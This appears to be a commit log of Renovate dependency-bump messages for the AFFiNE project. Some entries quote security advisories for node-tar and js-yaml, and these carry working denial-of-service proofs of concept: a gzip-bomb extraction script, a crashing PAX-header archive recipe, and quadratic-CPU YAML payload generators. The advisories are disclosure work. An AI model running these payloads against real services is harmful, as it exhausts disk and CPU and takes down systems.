[GHSA-23hp-3jrh-7fpw](https://redirect.github.com/advisories/GHSA-23hp-3jrh-7fpw) <details> <summary>More information</summary> #### Details ##### Summary A **Decompression/parse DoS via unlimited input** vulnerability in `node-tar` allows an attacker to exhaust server resources (disk space and CPU). Because the library does not enforce hard upper bounds on total decompressed data or entry counts, a small, maliciously crafted "Gzip Bomb" can be used to fill a server's storage and crash services. ##### Details The `node-tar` library does not enforce a hard upper bound on archive size or the volume of decompressed data processed during extraction. While the `maxReadSize` option exists, it only controls internal read chunk sizes (default 16MB) and does not limit the total cumulative bytes written to disk. Specifically, in `src/extract.ts`, the `Unpack` stream processes entries as they arrive. There is no total-bytes limit, entry-count limit, or decompression ratio guard. An attacker can provide a TAR header claiming a massive file size (e.g., 10GB) and follow it with highly compressible data (like zeros). `node-tar` will continue to extract and write this data until the physical disk is exhausted, as it lacks a mechanism to abort based on global resource consumption. ##### PoC The following Proof of Concept demonstrates how a tiny compressed input can be expanded into gigabytes of data on the host machine almost instantly. 1. Create the exploit script: ```javascript const fs = require('fs'), z = require('zlib'), t = require('tar'); const d = 'dos_test'; if (fs.existsSync(d)) fs.rmSync(d, {recursive:true}); fs.mkdirSync(d); // Build 10GB header const h = Buffer.alloc(512); h.write('payload'); h.write((10*1024**3).toString(8).padStart(11,'0'), 124); h.write('ustar', 257); let s = 256; for(let i=0;i<512;i++) if(i<148||i>155) s+=h[i]; h.write(s.toString(8).padStart(6,'0'), 148); const gz = z.createGzip(); gz.pipe(t.x({cwd: d})); gz.write(h); const b = Buffer.alloc(32 * 1024 * 1024); // 32MB chunks for speed const run = () => { while (gz.write(b)); gz.once('drain', run); }; const monitor = setInterval(() => { try { const bytes = fs.statSync(`${d}/payload`).size; const mb = Math.floor(bytes / (1024 * 1024)); process.stdout.write(`\r[>] Extracted: ${mb} MB`); if (mb > 5000) { console.log('\n[!] VULN CONFIRMED: 5GB+ written from tiny input.'); process.exit(); } } catch {} }, 50); process.on('exit', () => { clearInterval(monitor); console.log('[*] Cleaning up...'); if (fs.existsSync(d)) fs.rmSync(d, {recursive:true, force:true}); }); run(); ``` 2. Run the PoC: ```bash node poc.js ``` **Observation:** You will see the extracted size rapidly climb to 5,000 MB+ within seconds, while the actual data being "sent" through the gzip stream is negligible. ##### Impact This is a **Denial of Service (DoS)** vulnerability. It impacts any application or service that uses `node-tar` to extract archives provided by untrusted users (e.g., npm registries, CI/CD pipelines, or file-sharing platforms). An unauthenticated attacker can send a small payload that expands to consume all available disk space, leading to system-wide failure and service outages. #### Severity - CVSS Score: 9.2 / 10 (Critical) - Vector String: `CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H` #### References - [https://github.com/isaacs/node-tar/security/advisories/GHSA-23hp-3jrh-7fpw](https://redirect.github.com/isaacs/node-tar/security/advisories/GHSA-23hp-3jrh-7fpw) - [https://nvd.nist.gov/vuln/detail/CVE-2026-59873](https://nvd.nist.gov/vuln/detail/CVE-2026-59873) - [https://github.com/isaacs/node-tar/commit/2812e9338665659b183aa7226518c307044957d3](https://redirect.github.com/isaacs/node-tar/commit/2812e9338665659b183aa7226518c307044957d3) - [https://github.com/isaacs/node-tar/releases/tag/v7.5.19](https://redirect.github.com/isaacs/node-tar/releases/tag/v7.5.19) - [https://github.com/advisories/GHSA-23hp-3jrh-7fpw](https://redirect.github.com/advisories/GHSA-23hp-3jrh-7fpw) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-23hp-3jrh-7fpw) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### node-tar: Process crash via PAX numeric path type confusion [CVE-2026-59871](https://nvd.nist.gov/vuln/detail/CVE-2026-59871) / [GHSA-w8wr-v893-vjvp](https://redirect.github.com/advisories/GHSA-w8wr-v893-vjvp) <details> <summary>More information</summary> #### Details ##### Summary A crafted 2.5KB tar archive crashes any Node.js process that extracts it. The PAX header parser coerces all-digit path values to JavaScript numbers, which causes an uncaught TypeError when downstream code calls `.split('/')` on the numeric value. Error handlers and `strict: false` cannot intercept the crash. ##### Details In `pax.ts` line 180, `parseKV` converts PAX values matching `/^[0-9]+$/` to numbers via `+v`. This applies to all fields including `path` and `linkpath`. When a PAX header sets `path` to an all-digit string like `"12345"`, the value becomes the number `12345`. This number flows through Header -> ReadEntry -> Unpack.CHECKPATH, where `normalizeWindowsPath(entry.path).split('/')` throws a TypeError because numbers don't have `.split()`. The throw is synchronous during event emission and bypasses all error handling: - `strict: false` does not help - `'error'` event handlers do not catch it - `'warn'` handlers do not catch it - The TypeError propagates through the event emitter stack as an uncaughtException Directory, SymbolicLink, and Link type entries reach CHECKPATH and crash. File type entries crash earlier in Header constructor at `this.path.slice(-1)`, but that throw is caught and emitted as a warning only. ##### PoC Create a tar archive with a PAX extended header containing an all-digit path: ``` PAX header body: "18 path=12345\n" Entry type: Directory (type '5') ``` Extract it: ```js const tar = require('tar'); // All of these crash with TypeError: t.split is not a function tar.extract({ file: 'malicious.tar', cwd: '/tmp/test' }); // Error handlers don't help: tar.extract({ file: 'malicious.tar', cwd: '/tmp/test', strict: false }) .on('error', (err) => { /* never reached */ }) .on('warn', (code, msg) => { /* never reached */ }); ``` The archive is ~2.5KB. The crash is deterministic on every attempt. ##### Impact Denial of service. Any application or tool that extracts untrusted tar archives crashes from a single small file. This includes npm (which uses node-tar to extract packages), CI/CD pipelines, file upload processors, and backup tools. The crash cannot be caught by application-level error handling. #### Severity - CVSS Score: 5.3 / 10 (Medium) - Vector String: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L` #### References - [https://github.com/isaacs/node-tar/security/advisories/GHSA-w8wr-v893-vjvp](https://redirect.github.com/isaacs/node-tar/security/advisories/GHSA-w8wr-v893-vjvp) - [https://nvd.nist.gov/vuln/detail/CVE-2026-59871](https://nvd.nist.gov/vuln/detail/CVE-2026-59871) - [https://github.com/isaacs/node-tar/commit/e02a4e9e013c4be95302e2eb2047a942b883c27b](https://redirect.github.com/isaacs/node-tar/commit/e02a4e9e013c4be95302e2eb2047a942b883c27b) - [https://github.com/isaacs/node-tar/releases/tag/v7.5.18](https://redirect.github.com/isaacs/node-tar/releases/tag/v7.5.18) - [https://github.com/advisories/GHSA-w8wr-v893-vjvp](https://redirect.github.com/advisories/GHSA-w8wr-v893-vjvp) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-w8wr-v893-vjvp) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Release Notes <details> <summary>isaacs/node-tar (tar)</summary> ### [`v7.5.19`](https://redirect.github.com/isaacs/node-tar/compare/v7.5.18...v7.5.19) [Compare Source](https://redirect.github.com/isaacs/node-tar/compare/v7.5.18...v7.5.19) ### [`v7.5.18`](https://redirect.github.com/isaacs/node-tar/compare/v7.5.17...v7.5.18) [Compare Source](https://redirect.github.com/isaacs/node-tar/compare/v7.5.17...v7.5.18) ### [`v7.5.17`](https://redirect.github.com/isaacs/node-tar/compare/v7.5.16...v7.5.17) [Compare Source](https://redirect.github.com/isaacs/node-tar/compare/v7.5.16...v7.5.17) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yNzIuNCIsInVwZGF0ZWRJblZlciI6IjQzLjI3Mi40IiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
bd3fc7c78e |
chore: bump up js-yaml version to v4.3.0 [SECURITY] (#15298)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [js-yaml](https://redirect.github.com/nodeca/js-yaml) | [`4.2.0` → `4.3.0`](https://renovatebot.com/diffs/npm/js-yaml/4.2.0/4.3.0) |  |  | --- ### JS-YAML: Quadratic-complexity DoS in merge key handling via repeated aliases [CVE-2026-53550](https://nvd.nist.gov/vuln/detail/CVE-2026-53550) / [GHSA-h67p-54hq-rp68](https://redirect.github.com/advisories/GHSA-h67p-54hq-rp68) <details> <summary>More information</summary> #### Details ##### Summary A crafted YAML document can trigger algorithmic CPU exhaustion in `js-yaml` merge-key processing (`<<`) by repeating the same alias many times in a merge sequence. This causes quadratic parse-time behavior relative to input size and can block a Node.js worker/event loop for seconds with a relatively small payload (tens of KB), resulting in denial of service. ##### Details The issue is in merge handling inside `lib/loader.js`: - `storeMappingPair(...)` iterates every element of a merge sequence when key tag is `tag:yaml.org,2002:merge`. - For each element, it calls `mergeMappings(...)`. - `mergeMappings(...)` computes `Object.keys(source)` and performs `_hasOwnProperty.call(destination, key)` checks for each key. When input is of the form: a: &a {k0:0, k1:0, ..., kK:0} b: {<<: [*a, *a, *a, ... repeated M times ...]} all *a entries refer to the same anchored object. After the first merge, subsequent merges are semantically no-ops, but the parser still reprocesses all keys each time. Resulting work is O(K * M), while input size is O(K + M), giving quadratic scaling as payload grows. Relevant code path: lib/loader.js in storeMappingPair(...) merge branch (keyTag === 'tag:yaml.org,2002:merge') lib/loader.js mergeMappings(...) ##### Root cause File: lib/loader.js Function: storeMappingPair(state, _result, overridableKeys, keyTag, keyNode, valueNode, startLine, startLineStart, startPos) Lines: ~359-366 if (keyTag === 'tag:yaml.org,2002:merge') { if (Array.isArray(valueNode)) { for (index = 0, quantity = valueNode.length; index < quantity; index += 1) { mergeMappings(state, _result, valueNode[index], overridableKeys); } } else { mergeMappings(state, _result, valueNode, overridableKeys); } } When the merge value is a sequence (YAML 1.1 <<: [ *a, *a, ... ]), each element is handed to mergeMappings() without deduplication. mergeMappings() then does sourceKeys = Object.keys(source); for (index = 0; index < sourceKeys.length; index += 1) { key = sourceKeys[index]; if (!_hasOwnProperty.call(destination, key)) { setProperty(destination, key, source[key]); overridableKeys[key] = true; } } Every alias reference in the sequence resolves (by design) to the SAME object via state.anchorMap. After the first merge, every subsequent merge of that same reference is a pure no-op semantically, but still performs: * one Object.keys(source) call (O(K)) * K _hasOwnProperty.call checks on the destination Total: M * K hasOwnProperty checks + M Object.keys allocations, while the final object and all observable side effects are identical to a single merge. YAML semantics for `<<:` are idempotent and commutative over duplicate sources, so collapsing duplicates preserves behavior exactly; this isn't a spec trade-off. ##### PoC Environment: js-yaml version: 4.1.1 Node.js: v24.5.0 Platform: arm64 macOS (reproduced consistently) Reproduction script: Create many keys in one anchored map (&a). Merge that same alias repeatedly via <<: [*a, *a, ...]. Measure parse time and compare with control payload using single merge (<<: *a). Observed repeated runs (same machine): K=M=1000, input 9,909 bytes: ~33–36 ms K=M=2000, input 20,909 bytes: ~121–123 ms K=M=4000, input 42,909 bytes: ~524–537 ms K=M=6000, input 64,909 bytes: ~1,608–1,829 ms K=M=8000, input 86,909 bytes: ~3,395–3,565 ms Control (single merge, similar key counts): K=2000: ~1–2 ms K=4000: ~3 ms K=8000: ~5 ms Also verified: repeated-merge output equals single-merge output (same key count and same JSON), confirming excess time is redundant computation. ##### Impact This is a denial-of-service vulnerability (CPU exhaustion / algorithmic complexity). Any service parsing untrusted YAML with js-yaml can be impacted, including API backends, CI tools, config processors, and automation services. An attacker can submit crafted YAML to significantly increase CPU time and reduce availability. ##### Suggested fix: Dedupe the merge source list by reference before invoking mergeMappings. Any of the following are minimal and preserve YAML 1.1 merge semantics: dedupe in storeMappingPair: if (keyTag === 'tag:yaml.org,2002:merge') { if (Array.isArray(valueNode)) { var seen = new Set(); for (index = 0, quantity = valueNode.length; index < quantity; index += 1) { var src = valueNode[index]; if (seen.has(src)) continue; // idempotent; skip redundant alias seen.add(src); mergeMappings(state, _result, src, overridableKeys); } } else { mergeMappings(state, _result, valueNode, overridableKeys); } } #### Severity - CVSS Score: 5.3 / 10 (Medium) - Vector String: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L` #### References - [https://github.com/nodeca/js-yaml/security/advisories/GHSA-h67p-54hq-rp68](https://redirect.github.com/nodeca/js-yaml/security/advisories/GHSA-h67p-54hq-rp68) - [https://nvd.nist.gov/vuln/detail/CVE-2026-53550](https://nvd.nist.gov/vuln/detail/CVE-2026-53550) - [https://github.com/advisories/GHSA-h67p-54hq-rp68](https://redirect.github.com/advisories/GHSA-h67p-54hq-rp68) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-h67p-54hq-rp68) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### js-yaml: YAML merge-key chains can force quadratic CPU consumption [CVE-2026-59869](https://nvd.nist.gov/vuln/detail/CVE-2026-59869) / [GHSA-52cp-r559-cp3m](https://redirect.github.com/advisories/GHSA-52cp-r559-cp3m) <details> <summary>More information</summary> #### Details ##### Impact js-yaml can spend quadratic CPU time parsing a document whose size grows only linearly. The issue is triggered by a chain of mappings where each mapping merges the previous one: ```yaml a0: &a0 { k0: 0 } a1: &a1 { <<: *a0, k1: 1 } a2: &a2 { <<: *a1, k2: 2 } a3: &a3 { <<: *a2, k3: 3 } ... b: *aN ``` For each new mapping, the loader has to enumerate the keys inherited from the previous mapping. With N chained mappings, this results in roughly 1 + 2 + ... + N merged-key visits, i.e., O(N^2) work for O(N) input size. ##### PoC From N = 4000 delay become > 1s (doc size < 100K) ```js import { performance } from 'node:perf_hooks' import { Buffer } from 'node:buffer' import { load, YAML11_SCHEMA } from 'js-yaml' const n = Number(process.argv[2] || 4000) function makeMergeChain (count) { const lines = ['a0: &a0 { k0: 0 }'] for (let i = 1; i < count; i++) { lines.push(`a${i}: &a${i} { <<: *a${i - 1}, k${i}: ${i} }`) } lines.push(`b: *a${count - 1}`) return `${lines.join('\n')}\n` } const source = makeMergeChain(n) console.log(source.split('\n').slice(0, 8).join('\n')) console.log('...') console.log(source.split('\n').slice(-4).join('\n')) console.log() console.log(`N: ${n}`) console.log(`YAML size: ${Buffer.byteLength(source)} bytes`) const started = performance.now() const result = load(source, { schema: YAML11_SCHEMA }) const elapsed = performance.now() - started console.log(`parse time: ${elapsed.toFixed(1)} ms`) console.log(`top-level keys: ${Object.keys(result).length}`) console.log(`b keys: ${Object.keys(result.b).length}`) ``` ##### Patches Fix released. The most robust protection is to limit the total number of merged keys per parse call. This should close all past and future edge cases with merge. The default 10K-key limit should be okay in most cases. #### Severity - CVSS Score: 7.5 / 10 (High) - Vector String: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H` #### References - [https://github.com/nodeca/js-yaml/security/advisories/GHSA-52cp-r559-cp3m](https://redirect.github.com/nodeca/js-yaml/security/advisories/GHSA-52cp-r559-cp3m) - [https://nvd.nist.gov/vuln/detail/CVE-2026-59869](https://nvd.nist.gov/vuln/detail/CVE-2026-59869) - [https://github.com/nodeca/js-yaml/commit/24f13e79ee1343a7e30bd6f6c9d9cdbf0ac9b2b7](https://redirect.github.com/nodeca/js-yaml/commit/24f13e79ee1343a7e30bd6f6c9d9cdbf0ac9b2b7) - [https://github.com/nodeca/js-yaml/commit/59423c6f8cdc78742ac00e25a4dd39ef16b702e4](https://redirect.github.com/nodeca/js-yaml/commit/59423c6f8cdc78742ac00e25a4dd39ef16b702e4) - [https://github.com/nodeca/js-yaml/releases/tag/3.15.0](https://redirect.github.com/nodeca/js-yaml/releases/tag/3.15.0) - [https://github.com/nodeca/js-yaml/releases/tag/4.3.0](https://redirect.github.com/nodeca/js-yaml/releases/tag/4.3.0) - [https://github.com/advisories/GHSA-52cp-r559-cp3m](https://redirect.github.com/advisories/GHSA-52cp-r559-cp3m) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-52cp-r559-cp3m) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Release Notes <details> <summary>nodeca/js-yaml (js-yaml)</summary> ### [`v4.3.0`](https://redirect.github.com/nodeca/js-yaml/compare/4.2.0...33d05b5d29a8c21360f620f7e1c1706e24522eda) [Compare Source](https://redirect.github.com/nodeca/js-yaml/compare/4.2.0...4.3.0) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yNzIuNCIsInVwZGF0ZWRJblZlciI6IjQzLjI3Mi40IiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
9122cfd108 |
chore: bump up Node.js to v22.23.1 (#15277)
This PR contains the following updates: | Package | Update | Change | |---|---|---| | [node](https://nodejs.org) ([source](https://redirect.github.com/nodejs/node)) | patch | `22.23.0` → `22.23.1` | --- ### Release Notes <details> <summary>nodejs/node (node)</summary> ### [`v22.23.1`](https://redirect.github.com/nodejs/node/releases/tag/v22.23.1): 2026-06-23, Version 22.23.1 'Jod' (LTS), @​RafaelGSS [Compare Source](https://redirect.github.com/nodejs/node/compare/v22.23.0...v22.23.1) This release includes a fix for an unexpected behavior introduced by the recent security release (22.23.0). ##### Commits - \[[`41d2ee13be`](https://redirect.github.com/nodejs/node/commit/41d2ee13be)] - **build**: switch coverage-windows to `windows-2022` (Richard Lau) [#​63940](https://redirect.github.com/nodejs/node/pull/63940) - \[[`eaa292549e`](https://redirect.github.com/nodejs/node/commit/eaa292549e)] - **http**: avoid stream listeners on idle agent sockets (Matteo Collina) [#​64004](https://redirect.github.com/nodejs/node/pull/64004) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yNjUuMSIsInVwZGF0ZWRJblZlciI6IjQzLjI2NS4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
7e100d1c62 |
chore: bump up Node.js to v22.23.0 (#15142)
This PR contains the following updates: | Package | Update | Change | |---|---|---| | [node](https://nodejs.org) ([source](https://redirect.github.com/nodejs/node)) | minor | `22.22.3` → `22.23.0` | --- ### Release Notes <details> <summary>nodejs/node (node)</summary> ### [`v22.23.0`](https://redirect.github.com/nodejs/node/releases/tag/v22.23.0): 2026-06-18, Version 22.23.0 'Jod' (LTS), @​aduh95 [Compare Source](https://redirect.github.com/nodejs/node/compare/v22.22.3...v22.23.0) This is a security release. ##### Notable Changes - (CVE-2026-48618) tls: normalize hostname for server identity checks (Matteo Collina) – High - (CVE-2026-48933) crypto: guard WebCrypto cipher output length (Filip Skokan) – High - (CVE-2026-48937) deps: fix integration issues with the latest nghttp2 – Medium - (CVE-2026-48930) dns,net: reject hostnames with embedded NUL bytes (Matteo Collina) – Medium - (CVE-2026-48619) http2: cap originSet size to prevent unbounded memory growth (Matteo Collina) – Medium - (CVE-2026-48615) lib,test: redact proxy credentials in tunnel errors (Matteo Collina) – Medium - (CVE-2026-48934) tls: bind reusable sessions to authenticated host (Matteo Collina) – Medium - (CVE-2026-48928) tls: fix case-sensitive SNI context matching (Matteo Collina) – Medium - (CVE-2026-48617) permission: handle process.chdir on writereport (RafaelGSS) – Low - (CVE-2026-48931) http: fix response queue poisoning in http.Agent (Matteo Collina) – Low - (CVE-2026-48935) permission: disable FileHandle utimes with permission model (RafaelGSS) – Low ##### Commits - \[[`38b4c5ed51`](https://redirect.github.com/nodejs/node/commit/38b4c5ed51)] - **(CVE-2026-48933)** **crypto**: guard WebCrypto cipher output length (Filip Skokan) [nodejs-private/node-private#878](https://redirect.github.com/nodejs-private/node-private/pull/878) - \[[`ad8a10c1bb`](https://redirect.github.com/nodejs/node/commit/ad8a10c1bb)] - **deps**: update llhttp to 9.4.2 (Antoine du Hamel) [nodejs-private/node-private#890](https://redirect.github.com/nodejs-private/node-private/pull/890) - \[[`ca825a87cc`](https://redirect.github.com/nodejs/node/commit/ca825a87cc)] - **deps**: update undici to 6.27.0 (aduh95) [#​63711](https://redirect.github.com/nodejs/node/pull/63711) - \[[`a1a5bb9683`](https://redirect.github.com/nodejs/node/commit/a1a5bb9683)] - **(CVE-2026-48937)** **deps**: fix integration issues with the latest nghttp2 (Tim Perry) [#​62891](https://redirect.github.com/nodejs/node/pull/62891) - \[[`0f48583512`](https://redirect.github.com/nodejs/node/commit/0f48583512)] - **(SEMVER-MAJOR)** **deps**: update nghttp2 to 1.69.0 (Node.js GitHub Bot) [#​62891](https://redirect.github.com/nodejs/node/pull/62891) - \[[`38c869fc05`](https://redirect.github.com/nodejs/node/commit/38c869fc05)] - **deps**: update nghttp2 to 1.68.0 (nodejs-github-bot) [#​61136](https://redirect.github.com/nodejs/node/pull/61136) - \[[`290667c84f`](https://redirect.github.com/nodejs/node/commit/290667c84f)] - **deps**: update nghttp2 to 1.67.1 (nodejs-github-bot) [#​59790](https://redirect.github.com/nodejs/node/pull/59790) - \[[`c9f3da76aa`](https://redirect.github.com/nodejs/node/commit/c9f3da76aa)] - **deps**: update nghttp2 to 1.66.0 (Node.js GitHub Bot) [#​58786](https://redirect.github.com/nodejs/node/pull/58786) - \[[`60890be563`](https://redirect.github.com/nodejs/node/commit/60890be563)] - **deps**: update nghttp2 to 1.65.0 (Node.js GitHub Bot) [#​57269](https://redirect.github.com/nodejs/node/pull/57269) - \[[`5024c7d5d8`](https://redirect.github.com/nodejs/node/commit/5024c7d5d8)] - **deps**: update archs files for openssl-3.5.7 (Node.js GitHub Bot) [#​63820](https://redirect.github.com/nodejs/node/pull/63820) - \[[`7f4eb5af2e`](https://redirect.github.com/nodejs/node/commit/7f4eb5af2e)] - **deps**: upgrade openssl sources to openssl-3.5.7 (Node.js GitHub Bot) [#​63820](https://redirect.github.com/nodejs/node/pull/63820) - \[[`ebb4ec78a8`](https://redirect.github.com/nodejs/node/commit/ebb4ec78a8)] - **deps**: fix aix implicit declaration in OpenSSL (Abdirahim Musse) [#​62656](https://redirect.github.com/nodejs/node/pull/62656) - \[[`5763d40826`](https://redirect.github.com/nodejs/node/commit/5763d40826)] - **deps**: update llhttp to 9.4.1 (Node.js GitHub Bot) [#​63045](https://redirect.github.com/nodejs/node/pull/63045) - \[[`c551a51d0c`](https://redirect.github.com/nodejs/node/commit/c551a51d0c)] - **(CVE-2026-48930)** **dns,net**: reject hostnames with embedded NUL bytes (Matteo Collina) [nodejs-private/node-private#868](https://redirect.github.com/nodejs-private/node-private/pull/868) - \[[`0a22d40180`](https://redirect.github.com/nodejs/node/commit/0a22d40180)] - **(CVE-2026-48931)** **http**: fix response queue poisoning in http.Agent (Matteo Collina) [nodejs-private/node-private#846](https://redirect.github.com/nodejs-private/node-private/pull/846) - \[[`c79968e108`](https://redirect.github.com/nodejs/node/commit/c79968e108)] - **(CVE-2026-48619)** **http2**: cap originSet size to prevent unbounded memory growth (Matteo Collina) [nodejs-private/node-private#855](https://redirect.github.com/nodejs-private/node-private/pull/855) - \[[`0c37bff2ff`](https://redirect.github.com/nodejs/node/commit/0c37bff2ff)] - **http2**: fix DEP0194 message (KaKa) [#​58669](https://redirect.github.com/nodejs/node/pull/58669) - \[[`ea5dc6b529`](https://redirect.github.com/nodejs/node/commit/ea5dc6b529)] - **(SEMVER-MAJOR)** **http2**: remove support for priority signaling (Matteo Collina) [#​58293](https://redirect.github.com/nodejs/node/pull/58293) - \[[`9b6af26132`](https://redirect.github.com/nodejs/node/commit/9b6af26132)] - **(CVE-2026-48615)** **lib,test**: redact proxy credentials in tunnel errors (Matteo Collina) [nodejs-private/node-private#867](https://redirect.github.com/nodejs-private/node-private/pull/867) - \[[`28dcd38864`](https://redirect.github.com/nodejs/node/commit/28dcd38864)] - **(CVE-2026-48935)** **permission**: disable FileHandle utimes with permission model (RafaelGSS) [nodejs-private/node-private#873](https://redirect.github.com/nodejs-private/node-private/pull/873) - \[[`2f62693801`](https://redirect.github.com/nodejs/node/commit/2f62693801)] - **(CVE-2026-48617)** **permission**: handle process.chdir on writereport (RafaelGSS) [nodejs-private/node-private#870](https://redirect.github.com/nodejs-private/node-private/pull/870) - \[[`1662a3ea09`](https://redirect.github.com/nodejs/node/commit/1662a3ea09)] - **test**: add session reuse host verification regressions (Matteo Collina) [nodejs-private/node-private#854](https://redirect.github.com/nodejs-private/node-private/pull/854) - \[[`718d5d0e2c`](https://redirect.github.com/nodejs/node/commit/718d5d0e2c)] - **test**: skip `test-fs-utimes-y2K38` on armv7 (Richard Lau) [#​63836](https://redirect.github.com/nodejs/node/pull/63836) - \[[`041185b61f`](https://redirect.github.com/nodejs/node/commit/041185b61f)] - **test**: skip test-cluster-dgram-reuse on AIX 7.3 (Stewart X Addison) [#​62238](https://redirect.github.com/nodejs/node/pull/62238) - \[[`fd890ba01d`](https://redirect.github.com/nodejs/node/commit/fd890ba01d)] - **(CVE-2026-48934)** **tls**: bind reusable sessions to authenticated host (Matteo Collina) [nodejs-private/node-private#854](https://redirect.github.com/nodejs-private/node-private/pull/854) - \[[`39d1d09684`](https://redirect.github.com/nodejs/node/commit/39d1d09684)] - **(CVE-2026-48928)** **tls**: fix case-sensitive SNI context matching (Matteo Collina) [nodejs-private/node-private#857](https://redirect.github.com/nodejs-private/node-private/pull/857) - \[[`2197a47144`](https://redirect.github.com/nodejs/node/commit/2197a47144)] - **(CVE-2026-48618)** **tls**: normalize hostname for server identity checks (Matteo Collina) [nodejs-private/node-private#869](https://redirect.github.com/nodejs-private/node-private/pull/869) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMzEuMSIsInVwZGF0ZWRJblZlciI6IjQzLjIzMS4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
fa488aee64 |
chore: bump up apple/swift-collections version to from: "1.6.0" (#15136)
This PR contains the following updates: | Package | Update | Change | |---|---|---| | [apple/swift-collections](https://redirect.github.com/apple/swift-collections) | minor | `from: "1.5.1"` → `from: "1.6.0"` | --- ### Release Notes <details> <summary>apple/swift-collections (apple/swift-collections)</summary> ### [`v1.6.0`](https://redirect.github.com/apple/swift-collections/releases/tag/1.6.0): Swift Collections 1.6.0 [Compare Source](https://redirect.github.com/apple/swift-collections/compare/1.5.1...1.6.0) This is a feature release adding several useful operations to ordered collections, as well as shipping bug fixes that landed since 1.5.1. The list of supported Swift toolchain versions remains 6.0, 6.1, 6.2, and 6.3 for now. Note that we intend to retire support for Swift 6.0 and 6.1 in a subsequent release later this year. #### New `OrderedCollections` operations We now have several new operations that move existing elements in an `OrderedSet` or `OrderedDictionary` to a new position within the same collection: - `OrderedSet.moveSubrange(_:to:)` and `OrderedDictionary.moveSubrange(_:to:)` move items at a range of indices to just before the item at the specified destination index. - `OrderedSet.move(members:to:)` and `OrderedDictionary.move(keys:to:)` relocate elements identified by value (or key), preserving the order in which they're listed. - `OrderedSet.move(indices:to:)` and `OrderedDictionary.move(indices:to:)` relocate items at an arbitrary sequence of indices, preserving their listed order. #### Bugfixes - `SortedCollections` \[with the `UnstableSortedCollections` trait]: The default capacity of B-tree nodes is no longer clamped at 16, improving performance. ([#​257](https://redirect.github.com/apple/swift-collections/issues/257)) - `DequeModule`: The ownership-aware `RigidDeque` and `UniqueDeque` types no longer hand out invalid spans to clients ([#​659](https://redirect.github.com/apple/swift-collections/issues/659)) - `ContainersPreview` \[with the `UnstableContainersPreview` trait]: The deprecated `Borrow` type alias is now declared with correct availability. 